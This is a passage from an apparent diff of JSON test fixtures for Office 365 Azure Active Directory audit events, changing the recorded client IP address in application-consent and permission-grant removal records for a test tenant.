nsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -8753,9 +8753,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T18:26:06", "ExtendedProperties": [ { @@ -9230,7 +9230,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -9260,9 +9260,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:16:18", "ExtendedProperties": [ { @@ -9496,7 +9496,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove 